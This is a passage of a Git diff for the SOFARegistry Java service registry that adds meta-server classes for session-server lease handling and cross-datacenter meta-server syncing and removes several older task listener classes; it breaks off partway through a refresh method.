Nov 24, 2020 + */ +@Component +public class DefaultSessionServerManager + extends AbstractEvictableFilterableLeaseManager implements SessionServerManager { + + @Autowired private MetaServerConfig metaServerConfig; + + @Autowired private SlotManager slotManager; + + public DefaultSessionServerManager() {} + + public DefaultSessionServerManager( + MetaServerConfig metaServerConfig, + SlotManager slotManager, + MetaLeaderService metaLeaderService) { + this.metaServerConfig = metaServerConfig; + this.slotManager = slotManager; + this.metaLeaderService = metaLeaderService; + } + + @PostConstruct + public void postConstruct() throws Exception { + LifecycleHelper.initializeIfPossible(this); + LifecycleHelper.startIfPossible(this); + } + + @PreDestroy + public void preDestory() throws Exception { + LifecycleHelper.stopIfPossible(this); + LifecycleHelper.disposeIfPossible(this); + } + + @Override + public void register(Lease lease) { + super.register(lease); + notifyObservers(new NodeAdded<>(lease.getRenewal())); + } + /** + * Different from data server, session node maintains a 'ProcessId' to be as unique Id for Session + * Process(not server) + * + *

Once a restart event happened on the same session-server, an notification will be sent + */ + @Override + public boolean renew(SessionNode renewal, int duration) { + Metrics.Heartbeat.onSessionHeartbeat(renewal.getIp()); + Lease lease = getLease(renewal); + if (renewal.getProcessId() != null + && lease != null + && lease.getRenewal() != null + && !Objects.equals(lease.getRenewal().getProcessId(), renewal.getProcessId())) { + logger.warn( + "[renew] session node is restart, as process-Id change from {} to {}", + lease.getRenewal().getProcessId(), + renewal.getProcessId()); + // replace the session node, as it has changed process-id already + lease.setRenewal(renewal); + super.register(new Lease<>(renewal, duration)); + notifyObservers(new NodeModified<>(lease.getRenewal(), renewal)); + return false; + } else { + return super.renew(renewal, duration); + } + } + + @Override + public boolean cancel(Lease lease) { + boolean result = super.cancel(lease); + if (result) { + Metrics.Heartbeat.onSessionEvict(lease.getRenewal().getIp()); + notifyObservers(new NodeRemoved<>(lease.getRenewal())); + } + return result; + } + + @Override + protected int getIntervalMilli() { + return metaServerConfig.getExpireCheckIntervalMillis(); + } + + @Override + protected int getEvictBetweenMilli() { + return metaServerConfig.getExpireCheckIntervalMillis(); + } + + @Override + public VersionedList getSessionServerMetaInfo() { + VersionedList> leaseMetaInfo = getLeaseMeta(); + List sessionNodes = Lists.newArrayList(); + leaseMetaInfo + .getClusterMembers() + .forEach( + lease -> { + sessionNodes.add(lease.getRenewal()); + }); + return new VersionedList<>(leaseMetaInfo.getEpoch(), sessionNodes); + } + + @Override + public long getEpoch() { + return currentEpoch.get(); + } + + @Override + public void onHeartbeat(HeartbeatRequest heartbeat) { + if (amILeader() && !metaLeaderService.isWarmuped()) { + learnFromSession(heartbeat); + } + } + + protected void learnFromSession(HeartbeatRequest heartbeat) { + SlotTable slotTable = heartbeat.getSlotTable(); + slotManager.refresh(slotTable); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/session/SessionManagerObserver.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/session/SessionManagerObserver.java new file mode 100644 index 000000000..47b77a49f --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/session/SessionManagerObserver.java @@ -0,0 +1,25 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.session; + +import com.alipay.sofa.registry.observer.UnblockingObserver; + +/** + * @author chen.zhu + *

Dec 15, 2020 + */ +public interface SessionManagerObserver extends UnblockingObserver {} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/session/SessionServerManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/session/SessionServerManager.java new file mode 100644 index 000000000..77643b8a3 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/session/SessionServerManager.java @@ -0,0 +1,36 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.session; + +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.lifecycle.Lifecycle; +import com.alipay.sofa.registry.observer.Observable; +import com.alipay.sofa.registry.server.meta.lease.LeaseManager; +import com.alipay.sofa.registry.server.meta.monitor.session.SessionMessageListener; + +/** + * @author chen.zhu + *

Nov 23, 2020 + */ +public interface SessionServerManager + extends Observable, Lifecycle, LeaseManager, SessionMessageListener { + + VersionedList getSessionServerMetaInfo(); + + long getEpoch(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/listener/DataNodeChangePushTaskListener.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/listener/DataNodeChangePushTaskListener.java deleted file mode 100644 index a146d7721..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/listener/DataNodeChangePushTaskListener.java +++ /dev/null @@ -1,87 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.listener; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; -import com.alipay.sofa.registry.server.meta.task.Constant; -import com.alipay.sofa.registry.server.meta.task.DataNodeChangePushTask; -import com.alipay.sofa.registry.server.meta.task.MetaServerTask; -import com.alipay.sofa.registry.task.batcher.TaskDispatcher; -import com.alipay.sofa.registry.task.batcher.TaskDispatchers; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListener; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: DataNodeChangePushTaskListener.java, v 0.1 2018-01-24 12:19 shangyu.wh Exp $ - */ -public class DataNodeChangePushTaskListener implements TaskListener { - - private TaskDispatcher dataSingleTaskDispatcher; - - private TaskDispatcher sessionSingleTaskDispatcher; - - @Autowired - private MetaServerConfig metaServerConfig; - - /** - * constructor - * @param dataNodeSingleTaskProcessor - */ - public DataNodeChangePushTaskListener(TaskProcessor dataNodeSingleTaskProcessor) { - - dataSingleTaskDispatcher = TaskDispatchers.createDefaultSingleTaskDispatcher( - TaskType.DATA_NODE_CHANGE_PUSH_TASK.getName() + "Data", dataNodeSingleTaskProcessor); - - sessionSingleTaskDispatcher = TaskDispatchers.createDefaultSingleTaskDispatcher( - TaskType.DATA_NODE_CHANGE_PUSH_TASK.getName() + "Session", dataNodeSingleTaskProcessor); - } - - @Override - public boolean support(TaskEvent event) { - return TaskType.DATA_NODE_CHANGE_PUSH_TASK.equals(event.getTaskType()); - } - - @Override - public void handleEvent(TaskEvent event) { - - NodeType nodeType = (NodeType) event.getAttribute(Constant.PUSH_TARGET_TYPE); - switch (nodeType) { - case SESSION: - MetaServerTask sessionNodeChangePushTask = new DataNodeChangePushTask( - NodeType.SESSION, metaServerConfig); - sessionNodeChangePushTask.setTaskEvent(event); - sessionSingleTaskDispatcher.dispatch(sessionNodeChangePushTask.getTaskId(), - sessionNodeChangePushTask, sessionNodeChangePushTask.getExpiryTime()); - break; - case DATA: - MetaServerTask dataNodeChangePushTask = new DataNodeChangePushTask(NodeType.DATA, - metaServerConfig); - dataNodeChangePushTask.setTaskEvent(event); - dataSingleTaskDispatcher.dispatch(dataNodeChangePushTask.getTaskId(), - dataNodeChangePushTask, dataNodeChangePushTask.getExpiryTime()); - break; - default: - break; - } - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/listener/PersistenceDataChangeNotifyTaskListener.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/listener/PersistenceDataChangeNotifyTaskListener.java deleted file mode 100644 index f2e5714ed..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/listener/PersistenceDataChangeNotifyTaskListener.java +++ /dev/null @@ -1,64 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.listener; - -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; -import com.alipay.sofa.registry.server.meta.task.MetaServerTask; -import com.alipay.sofa.registry.server.meta.task.PersistenceDataChangeNotifyTask; -import com.alipay.sofa.registry.task.batcher.TaskDispatcher; -import com.alipay.sofa.registry.task.batcher.TaskDispatchers; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListener; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: DataCenterChangeNotifyTaskListener.java, v 0.1 2018-02-12 12:26 shangyu.wh Exp $ - */ -public class PersistenceDataChangeNotifyTaskListener implements TaskListener { - - @Autowired - private MetaServerConfig metaServerConfig; - - private TaskDispatcher singleTaskDispatcher; - - /** - * constructor - * @param sessionNodeSingleTaskProcessor - */ - public PersistenceDataChangeNotifyTaskListener(TaskProcessor sessionNodeSingleTaskProcessor) { - singleTaskDispatcher = TaskDispatchers.createDefaultSingleTaskDispatcher( - TaskType.PERSISTENCE_DATA_CHANGE_NOTIFY_TASK.getName(), sessionNodeSingleTaskProcessor); - } - - @Override - public boolean support(TaskEvent event) { - return TaskType.PERSISTENCE_DATA_CHANGE_NOTIFY_TASK.equals(event.getTaskType()); - } - - @Override - public void handleEvent(TaskEvent event) { - MetaServerTask persistenceDataChangeNotifyTask = new PersistenceDataChangeNotifyTask( - metaServerConfig); - persistenceDataChangeNotifyTask.setTaskEvent(event); - singleTaskDispatcher.dispatch(persistenceDataChangeNotifyTask.getTaskId(), - persistenceDataChangeNotifyTask, persistenceDataChangeNotifyTask.getExpiryTime()); - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/listener/ReceiveStatusConfirmNotifyTaskListener.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/listener/ReceiveStatusConfirmNotifyTaskListener.java deleted file mode 100644 index 66b8dbe6b..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/listener/ReceiveStatusConfirmNotifyTaskListener.java +++ /dev/null @@ -1,68 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.listener; - -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; -import com.alipay.sofa.registry.server.meta.node.DataNodeService; -import com.alipay.sofa.registry.server.meta.node.NodeService; -import com.alipay.sofa.registry.server.meta.task.MetaServerTask; -import com.alipay.sofa.registry.server.meta.task.ReceiveStatusConfirmNotifyTask; -import com.alipay.sofa.registry.task.batcher.TaskDispatcher; -import com.alipay.sofa.registry.task.batcher.TaskDispatchers; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListener; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: ReceiveStatusConfirmNotifyTaskListener.java, v 0.1 2018-03-24 17:34 shangyu.wh Exp $ - */ -public class ReceiveStatusConfirmNotifyTaskListener implements TaskListener { - - @Autowired - NodeService dataNodeService; - @Autowired - private MetaServerConfig metaServerConfig; - private TaskDispatcher singleTaskDispatcher; - - /** - * constructor - * @param dataNodeSingleTaskProcessor - */ - public ReceiveStatusConfirmNotifyTaskListener(TaskProcessor dataNodeSingleTaskProcessor) { - - singleTaskDispatcher = TaskDispatchers.createDefaultSingleTaskDispatcher( - TaskType.RECEIVE_STATUS_CONFIRM_NOTIFY_TASK.getName(), dataNodeSingleTaskProcessor); - } - - @Override - public boolean support(TaskEvent event) { - return TaskType.RECEIVE_STATUS_CONFIRM_NOTIFY_TASK.equals(event.getTaskType()); - } - - @Override - public void handleEvent(TaskEvent event) { - MetaServerTask receiveStatusConfirmNotifyTask = new ReceiveStatusConfirmNotifyTask( - (DataNodeService) dataNodeService, metaServerConfig); - receiveStatusConfirmNotifyTask.setTaskEvent(event); - singleTaskDispatcher.dispatch(receiveStatusConfirmNotifyTask.getTaskId(), - receiveStatusConfirmNotifyTask, receiveStatusConfirmNotifyTask.getExpiryTime()); - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/listener/SessionNodeChangePushTaskListener.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/listener/SessionNodeChangePushTaskListener.java deleted file mode 100644 index 24dd13e3a..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/listener/SessionNodeChangePushTaskListener.java +++ /dev/null @@ -1,63 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.listener; - -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; -import com.alipay.sofa.registry.server.meta.task.MetaServerTask; -import com.alipay.sofa.registry.server.meta.task.SessionNodeChangePushTask; -import com.alipay.sofa.registry.task.batcher.TaskDispatcher; -import com.alipay.sofa.registry.task.batcher.TaskDispatchers; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListener; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: SessionNodeChangePushTaskListener.java, v 0.1 2018-01-15 14:47 shangyu.wh Exp $ - */ -public class SessionNodeChangePushTaskListener implements TaskListener { - - @Autowired - private MetaServerConfig metaServerConfig; - - private TaskDispatcher singleTaskDispatcher; - - /** - * constructor - * @param sessionNodeSingleTaskProcessor - */ - public SessionNodeChangePushTaskListener(TaskProcessor sessionNodeSingleTaskProcessor) { - singleTaskDispatcher = TaskDispatchers.createDefaultSingleTaskDispatcher( - TaskType.SESSION_NODE_CHANGE_PUSH_TASK.getName(), sessionNodeSingleTaskProcessor); - } - - @Override - public boolean support(TaskEvent event) { - return TaskType.SESSION_NODE_CHANGE_PUSH_TASK.equals(event.getTaskType()); - } - - @Override - public void handleEvent(TaskEvent event) { - MetaServerTask sessionNodeChangePushTask = new SessionNodeChangePushTask(metaServerConfig); - sessionNodeChangePushTask.setTaskEvent(event); - singleTaskDispatcher.dispatch(sessionNodeChangePushTask.getTaskId(), - sessionNodeChangePushTask, sessionNodeChangePushTask.getExpiryTime()); - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/CrossDcMetaServer.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/CrossDcMetaServer.java new file mode 100644 index 000000000..124d6b08f --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/CrossDcMetaServer.java @@ -0,0 +1,30 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.metaserver; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.datacenter.DataCenterAware; +import com.alipay.sofa.registry.server.meta.MetaServer; +import com.alipay.sofa.registry.server.meta.cluster.NodeCluster; +import com.alipay.sofa.registry.server.meta.cluster.RemoteServers; + +/** + * @author chen.zhu + *

Nov 20, 2020 + */ +public interface CrossDcMetaServer + extends DataCenterAware, NodeCluster, RemoteServers, MetaServer {} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/CrossDcMetaServerManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/CrossDcMetaServerManager.java new file mode 100644 index 000000000..cff3151c4 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/CrossDcMetaServerManager.java @@ -0,0 +1,37 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.metaserver; + +import com.alipay.sofa.registry.lifecycle.Lifecycle; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.MetaServer; + +/** + * @author chen.zhu + *

Nov 19, 2020 + */ +public interface CrossDcMetaServerManager + extends Lifecycle, MetaLeaderService.MetaLeaderElectorListener { + + /** + * Gets get or create. + * + * @param dc the dc + * @return the get or create + */ + MetaServer getOrCreate(String dc); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/CurrentDcMetaServer.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/CurrentDcMetaServer.java new file mode 100644 index 000000000..4ca1f352c --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/CurrentDcMetaServer.java @@ -0,0 +1,42 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.metaserver; + +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.observer.Observable; +import com.alipay.sofa.registry.server.meta.MetaServer; +import com.alipay.sofa.registry.server.meta.cluster.NodeCluster; +import com.alipay.sofa.registry.server.meta.lease.data.DataServerManager; +import com.alipay.sofa.registry.server.meta.lease.session.SessionServerManager; + +/** + * @author chen.zhu + *

Nov 23, 2020 + */ +public interface CurrentDcMetaServer extends MetaServer, NodeCluster, Observable { + + void renew(MetaNode metaNode); + + void cancel(MetaNode metaNode); + + void updateClusterMembers(VersionedList metaNodes); + + DataServerManager getDataServerManager(); + + SessionServerManager getSessionServerManager(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/AbstractMetaServer.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/AbstractMetaServer.java new file mode 100644 index 000000000..8db321a82 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/AbstractMetaServer.java @@ -0,0 +1,36 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.metaserver.impl; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.observer.impl.AbstractLifecycleObservable; +import com.alipay.sofa.registry.server.meta.MetaServer; +import com.google.common.collect.Sets; +import java.util.Set; +import java.util.concurrent.locks.ReadWriteLock; +import java.util.concurrent.locks.ReentrantReadWriteLock; + +/** + * @author chen.zhu + *

Nov 20, 2020 + */ +public abstract class AbstractMetaServer extends AbstractLifecycleObservable implements MetaServer { + + protected volatile Set metaServers = Sets.newHashSet(); + + protected final ReadWriteLock lock = new ReentrantReadWriteLock(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultCrossDcMetaServer.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultCrossDcMetaServer.java new file mode 100644 index 000000000..e3e819558 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultCrossDcMetaServer.java @@ -0,0 +1,356 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.metaserver.impl; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.DataCenterNodes; +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.common.model.metaserver.rpc.NodeClusterViewRequest; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.exception.DisposeException; +import com.alipay.sofa.registry.exception.InitializeException; +import com.alipay.sofa.registry.exception.StartException; +import com.alipay.sofa.registry.exception.StopException; +import com.alipay.sofa.registry.lifecycle.impl.LifecycleHelper; +import com.alipay.sofa.registry.remoting.CallbackHandler; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.metaserver.CrossDcMetaServer; +import com.alipay.sofa.registry.server.meta.slot.SlotAllocator; +import com.alipay.sofa.registry.server.meta.slot.arrange.CrossDcSlotAllocator; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Lists; +import com.google.common.collect.Sets; +import java.util.Collection; +import java.util.List; +import java.util.Set; +import java.util.concurrent.Executor; +import java.util.concurrent.ScheduledExecutorService; +import java.util.concurrent.ScheduledFuture; +import java.util.concurrent.TimeUnit; +import java.util.concurrent.atomic.AtomicInteger; +import java.util.concurrent.atomic.AtomicLong; +import org.springframework.aop.target.dynamic.Refreshable; + +/** + * @author chen.zhu + *

Nov 20, 2020 + *

Generated through Factory CrossDcMetaServer is an object(could be as many as data centers + * we replicates data) that managing corresponding meta-server infos, as: 1. meta server list + * (here we consider cross-dc meta-servers as one virtual meta-server, as it supports nothing + * but slot-table) 2. slot table + *

Scheduled Job is running inside meta-server object for high-cohesion perspective Other + * objects should not and must not have the privilege to care about updating slot-table or + * meta-server list What other objects needs to know is "Hey, I got the picture of other + * data-center's slot view and meta-server list" + *

See @doRefresh for meta server list update See @refreshSlotTable for slot table update + */ +public class DefaultCrossDcMetaServer extends AbstractMetaServer + implements CrossDcMetaServer, Refreshable { + + private final String dcName; + + private final List initMetaAddresses; + + private final AtomicLong currentVersion = new AtomicLong(); + + private final ScheduledExecutorService scheduled; + + private volatile ScheduledFuture future; + + private final AtomicLong counter = new AtomicLong(); + + private final AtomicLong timestamp = new AtomicLong(); + + private final MetaLeaderService metaLeaderService; + + private SlotAllocator allocator; + + private final Exchange exchange; + + private final AtomicInteger requestMetaNodeIndex = new AtomicInteger(0); + + private final MetaServerConfig metaServerConfig; + + public DefaultCrossDcMetaServer( + String dcName, + Collection metaServerIpAddresses, + ScheduledExecutorService scheduled, + Exchange exchange, + MetaLeaderService metaLeaderService, + MetaServerConfig metaServerConfig) { + this.dcName = dcName; + this.initMetaAddresses = Lists.newArrayList(metaServerIpAddresses); + this.scheduled = scheduled; + this.exchange = exchange; + this.metaLeaderService = metaLeaderService; + this.metaServerConfig = metaServerConfig; + } + + @Override + protected void doInitialize() throws InitializeException { + super.doInitialize(); + initMetaNodes(); + initSlotAllocator(); + } + + private void initMetaNodes() { + Set metaNodes = Sets.newHashSet(); + for (String ip : initMetaAddresses) { + metaNodes.add(new MetaNode(new URL(ip), dcName)); + } + this.metaServers = metaNodes; + } + + private void initSlotAllocator() throws InitializeException { + this.allocator = new CrossDcSlotAllocator(dcName, scheduled, exchange, this, metaLeaderService); + LifecycleHelper.initializeIfPossible(allocator); + } + + @Override + protected void doStart() throws StartException { + super.doStart(); + future = + scheduled.scheduleWithFixedDelay( + new Runnable() { + @Override + public void run() { + if (metaLeaderService.amIStableAsLeader()) { + refresh(); + } + } + }, + getIntervalMilli(), + getIntervalMilli(), + TimeUnit.MILLISECONDS); + // start allocator for slot purpose + LifecycleHelper.startIfPossible(allocator); + } + + @Override + protected void doStop() throws StopException { + // stop allocator for slot purpose + try { + LifecycleHelper.stopIfPossible(allocator); + } catch (StopException e) { + logger.error("[stop][stop allocator error]", e); + } + if (future != null) { + future.cancel(true); + future = null; + } + super.doStop(); + } + + @Override + protected void doDispose() throws DisposeException { + LifecycleHelper.disposeIfPossible(allocator); + super.doDispose(); + } + + @Override + public String getDc() { + return dcName; + } + + @Override + public SlotTable getSlotTable() { + if (!getLifecycleState().isStarted()) { + throw new IllegalStateException("[DefaultCrossDcMetaServer] not started yet"); + } + return allocator.getSlotTable(); + } + + public long getEpoch() { + return currentVersion.get(); + } + + @Override + public List getClusterMembers() { + return Lists.newArrayList(metaServers); + } + + private int getIntervalMilli() { + return metaServerConfig.getCrossDcMetaSyncIntervalMillis(); + } + + @VisibleForTesting + protected void doRefresh(int retryTimes) { + if (retryTimes >= 3) { + logger.warn("[doRefresh]retries more than {} times, stop", 3); + return; + } + NodeClusterViewRequest request = new NodeClusterViewRequest(Node.NodeType.META, getDc()); + MetaNode metaServer = 